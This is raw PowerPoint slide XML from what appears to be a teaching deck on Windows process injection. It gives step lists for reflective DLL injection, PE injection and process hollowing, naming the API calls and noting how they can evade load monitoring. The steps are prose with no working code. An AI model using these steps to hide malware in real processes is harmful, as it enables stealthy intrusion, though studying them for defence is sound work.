                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>LoadLibrary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> function that supports this. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>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achieve the functionality, adversaries must write their own function, omitting some of the things Windows normally does, such as registering the DLL as a loaded module in the process, potentially bypassing DLL load monitoring. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="520414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AF77-633E-1358-71AB-BB8B7A25353A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="657606" y="304800"/>
            <a:ext cx="10772775" cy="663388"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Steps for performing the attack</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C4F2FC-DD0A-1C91-9791-C53E7075D377}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="676656" y="1201271"/>
            <a:ext cx="10753725" cy="5145741"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>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Open target process and allocate memory large enough for the DLL.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Copy the DLL into the allocated memory space.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Calculate the memory offset within the DLL to the export used for doing reflective loading.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Call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>CreateRemoteThread</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> (or an equivalent undocumented API function like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>RtlCreateUserThread</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>) to start execution in the remote process, using the offset address of the reflective loader function as the entry point.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reflective loader function finds the Process Environment Block of the target process using the appropriate CPU register and uses that to find the address in memory of kernel32.dll and any other required libraries.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Parse the exports directory of kernel32 to find the memory addresses of required API functions such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>LoadLibraryA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GetProcAddress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>VirtualAlloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>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Use these functions to then load the DLL (itself) properly into memory and call its entry point, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>DllMain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>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502360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AF77-633E-1358-71AB-BB8B7A25353A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="657606" y="304800"/>
            <a:ext cx="10772775" cy="663388"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Portable Executable Loading (Injection)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C4F2FC-DD0A-1C91-9791-C53E7075D377}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="676656" y="1201271"/>
            <a:ext cx="10753725" cy="5145741"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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Portable Executable injection and loading does not require the DLL (or executable) to be stored on disk. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>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load and execute the injected PE, malware needs to calculate the new base address of the injected PE to properly change its fixed addresses. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>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accomplish this, malware will traverse its relocation table inside the target process to compute the correct addresses.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2925925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AF77-633E-1358-71AB-BB8B7A25353A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="657606" y="304800"/>
            <a:ext cx="10772775" cy="663388"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Steps for performing the attack</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C4F2FC-DD0A-1C91-9791-C53E7075D377}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="676656" y="968188"/>
            <a:ext cx="10753725" cy="5091953"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="40000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Using the PE header of the current image, get its base address and size.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>In the processes injecting the PE, allocate memory for the image using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>VirtualAlloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>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3400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Copy the image into the locally allocated memory using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>memcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>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3400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>In the target process, allocate memory for the injected image with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>VirtualAllocEx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>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3400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>In the process injecting the PE, find the relocation table offset from loaded in local memory.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Fix all the absolute addresses of the image to work with the address returned by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>VirtualAllocEx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>, by traversing the relocation table from step 5.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Inject (copy) the image from the local process to the target process’ allocated memory using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>WriteProcessMemory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>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3400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Find the correct address of the exported function to be executed inside the target process:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>a) Subtract the function’s address in the injecting process from the base address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>B) In the target process, add the result from (b) to the address of the allocated memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>9. Execute the injected by creating a new thread with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>CreateRemoteThread</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> , passing it the remote address of the function from step 8.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1598694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AF77-633E-1358-71AB-BB8B7A25353A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="657606" y="304800"/>
            <a:ext cx="10772775" cy="663388"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Process Hollowing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C4F2FC-DD0A-1C91-9791-C53E7075D377}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="676656" y="968188"/>
            <a:ext cx="10753725" cy="5091953"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr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 legitimate process is started by malware in a suspended state. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>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Then, while in a suspended state, the target process memory is unmapped (hollowed) to contain the malicious payload.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1695906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AF77-633E-1358-71AB-BB8B7A25353A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="657606" y="304800"/>
            <a:ext cx="10772775" cy="663388"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Steps for performing the attack</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C4F2FC-DD0A-1C91-9791-C53E7075D377}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="676656" y="968188"/>
            <a:ext cx="10753725" cy="5091953"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr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Start a new process in a suspended state by calling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>CreateProcess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>CreationFlags</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> parameter set to CREATE_SUSPENDED=0x00000004.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Unmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> the memory of the target process using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ZwUnmapViewOfSection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>NtUnmapViewOfSection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>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Allocate space in memory for the malicious payload using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>VirtualAllocEx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>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Inject the payload in the allocated memory region with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>WriteProcessMemory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>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Change the execution point of the targeted process to start from the correct point in the injected payload by calling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>GetThreadContext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>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Resume targeted process execution by calling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
